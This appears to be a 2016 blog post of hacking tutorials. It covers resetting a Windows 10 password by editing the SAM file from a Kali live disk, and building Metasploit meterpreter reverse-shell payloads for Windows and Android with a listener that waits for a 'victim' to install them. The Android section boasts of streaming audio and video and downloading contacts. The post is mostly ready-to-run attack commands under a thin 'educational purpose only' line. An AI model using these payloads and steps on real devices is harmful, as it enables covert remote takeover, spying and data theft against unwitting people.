Wednesday, 24 August 2016

Reset Windows 10 password using Kali

Reset Windows 10 password using Kali::
=============================

Suppose you forgot the windows password.

Steps as follows to reset the password using Kali as it comes with pre-installed tools for windows password reset.

Boot  the machine using live Kali DVD.

goto ::
# cd /media/mountname/windows/system32/config
# ls -a SAM   --  (which is the user credential file for windows.)
# chntpw -l  SAM --(to list the users)
# chntpw -u username SAM --(to unlock the user)
  select option 1 to clear the password
Again run the same command
# chntpw -u username SAM
  select option 4 to enable the account.

Now reboot to Windows. You should be able to login without any password and can set a new password.

Login to command prompt and type
# net user username  --( To reset the password, Enter new password)
logout and login with the new credentials.

Hope this helps..:)

Hacking Windows 10 using Kali::


Hacking Windows 10/8/7::
=================

This is for educational purpose only.

Install Kali Linux -- > Run updates


create venom in the shell to inject the victim... :)

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2  LPORT=4444 R>yourareowned.exe

Replace ip with your local/public ip and make sure that the port is open in your box and at the service provider


Use the tool metasploit.
Commands as follows and you will be  able to do it

# msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set lhost 192.168.1.2  (for lan hack use local ip and for wan hack use public ip)
# set lport 4444 (for lan hack the port should be open on your box and for wan hack it should be open in your router)
# exploit


Once the victim installs the exefile, we will receive signals from the windows box under the msfconsole.

Type "help"  for the command options available. You will be able to find all windows commands.

Give a try and let me know if I could help you on this.

Hacking an Android Mobile

Hacking an Android Mobile::
=====================

This is for educational purpose only.

Install Kali Linux -- > Run updates


creating venom in the shell to inject the victim... :)

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.2  LPORT=4444 R>yourareowned.apk

Replace ip with your local/public ip and make sure that the port is open in your box and at the service provider


Use the tool metasploit.
Commands as follows and you will be  able to do it

# msfconsole
# use exploit/multi/handler
# set payload android/meterpreter/reverse_tcp
# set lhost 192.168.1.2  (for lan hack use local ip and for wan hack use public ip)
# set lport 4444 (for lan hack the port should be open on your box and for wan hack it should be open in your router)
# exploit


Once the victim installs the apk file, we will receive signals from the android mobile under the msfconsole.

Type help  for the command options available. You will be able to find many commands.
# check_root     (use this command to root the mobile)
And you own it now.. Do what ever you want.. stream audio, video, download contacts and whatever


Kali Installation and updates

Kali Installation and updates::
=====================


My personal opinion is to install Kali Linux on a  Virtual Box which is more safe to try different tools available.  But in case of brute force attack for password cracking, VM won't suite as I believe the memory won't be sufficient and it may take years.  In that case it is better to have standalone installations.



Latest versions available at https://www.kali.org/downloads/



Install it as it is very similar to debian installation.



After installation run the commands below for updates.



# apt-get update && apt-get upgrade && apt-get dist-upgrade -y --fix-missing



Also install VM tools to enhance some fuctionalities like copy/paste between VM and 
host and screen resizing to work perfectly.



# apt-get install open-vm-tools-desktop fuse


# reboot